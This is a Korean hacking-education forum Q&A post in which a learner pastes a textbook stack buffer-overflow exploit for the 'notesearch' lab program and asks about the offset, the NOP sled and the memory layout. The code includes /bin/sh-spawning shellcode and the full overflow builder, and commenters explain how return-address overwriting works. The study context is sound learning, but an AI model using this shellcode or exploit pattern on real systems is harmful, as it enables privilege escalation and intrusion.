시스템 해킹

1576,

1/79

부왁몬

답변좀요 ㅠ

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1430 [복사]

음.. 일단 이 코드는 해킹 공격의 예술 책에 나온 소스코드인데요..

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

입니다. 여기서 이해가 안가는 부분이 4가지가 있는데요..

1. i주소에서 offset 을 뺀 이유가  뭔가요?

2. offset 은 왜 270 인가 ?

3. char * buffer 와 command 는 동적으로 할당되기 때문에 스택이 아닌 힙에 할당되는 것 아닌가요?

그런데 왜 오프셋은 270이나 되나요 ?

4.이 프로그램의 메모리 구조가 궁금한데요

책에서보면 썰매(NOP)를 이용해서 쉘코드를 실행시킨다고 나와있습니다. 그러면

ret 주소를 썰매(NOP)가 있는 주소로 바꾼다 -> ret주소를 실행해 썰매를 탄다 -> 쉘코드가 실행된다.

이렇게되면 메모리구조는

(높은주소)------------ (낮은주소)

            ret ----NOP----쉘코드

이렇게 되나요?

질문이 많지만 답변부탁드려요 ㅠ

Hit : 3733 Date : 2010/10/02 08:51


kaca2100	힙메모리는 낮은주소에서 높은주소로 올라갑니다 . 스택과 반대 .	2010/10/02
부왁몬	ㄴ 아 그렇군요.. 근데 책에보니까 NOP 쉘코드 리턴주소반복 순서라는데 저 프로그램이 실행되면 ret값을 NOP의 주소로 덮어씌워서 쉘코드를 실행시킨다고 하는데요. 프로그램이 실행되면 ret 주소는 언제쓰고 ret주소를 먼저 덮어야되는데 왜 리턴주소 반복이 뒤에잇나용??	2010/10/02
프라이드	오우 힙오버플로우라 ㅋㅋ	2010/10/02
k1rha	프로그램이 실행될때 코드의 문제점을 이용해서 RET 주소에 자기가 원하는 리턴주소를 써주는겁니다. NOP 코드는.. 정확한 주소를 찍을수 없기떄문에.. 프로그램을 그냥 흘려서 맞춰주는거구요	2010/10/06

1576

버그바운티를 할 정도의 수준이면 어떻게 로드맵을 잡아야 하나요?

해킹잘하고싶다

05/03

1278

1575

LOB 문제 익스플로잇을 C로 작성하면서 푸는데요.[2]

해킹잘하고싶다

09/18

1552

1574

pwnable.kr echo1 질문2 (스포 주의)[2]

turttle2s

10/05

2662

1573

LOB GATE문제 풀면서 궁금한점[3]

hackxx123

08/24

2282

1572

libc관련 - 2[5]

lMaxl04

08/24

2256

1571

ASLR이 걸려있을때 ret에 ROP으로 jmp %esp을 사용한 경우.[3]

lMaxl04

06/29

2454

1570

리모트 환경에서의 스택 주소 확인 방법이 궁금합니다.[2]

lMaxl04

06/16

2062

1569

해킹 프리서버 없어졌나요?[1]

terfkim

04/15

2949

1568

스택에 데이터 넣을 때 SIGSEGV[4]

turttle2s

02/04

2646

1567

pwnable.kr echo1 질문[2]

turttle2s

06/17

2938

1566

ROP strcpy 관련 질문입니다.[3]

heeyoung0511

06/16

2613

1565

Level2 -> Level3 에서 vi와 /usr/bin/Editor의 차이[2]

hyemin1826

07/18

3031

1564

Trainer3 ftz.hackerschool.org 호스트 접속 불가[1]

hyemin1826

07/18

4827

1563

dll인젝션 실험중 질문 드립니다.[1]

kkk477

05/31

2985

1562

패킷 복호화를 마스터 하려면 어떤 과정이 있어야하나요?

sa0814

04/01

2555

1561

사기[2]

jas08

03/31

2905

1560

시스템 콜이 가능한 메모리 영역과 불가능한 메모리 영역이 존재하나요?

ocal

03/30

2557

1559

pwntools 사용시와 기본 socket 모듈 이용시 차이?[4]

ocal

01/09

3472

1558

lob level19(nightmare) 관련질문[1]

dnjsdnwja

12/18

2552

1557

ftz level2 질문있습니다[1]

kihyun1998

12/13

2751

1 [2][3][4][5][6][7][8][9][10]..[79]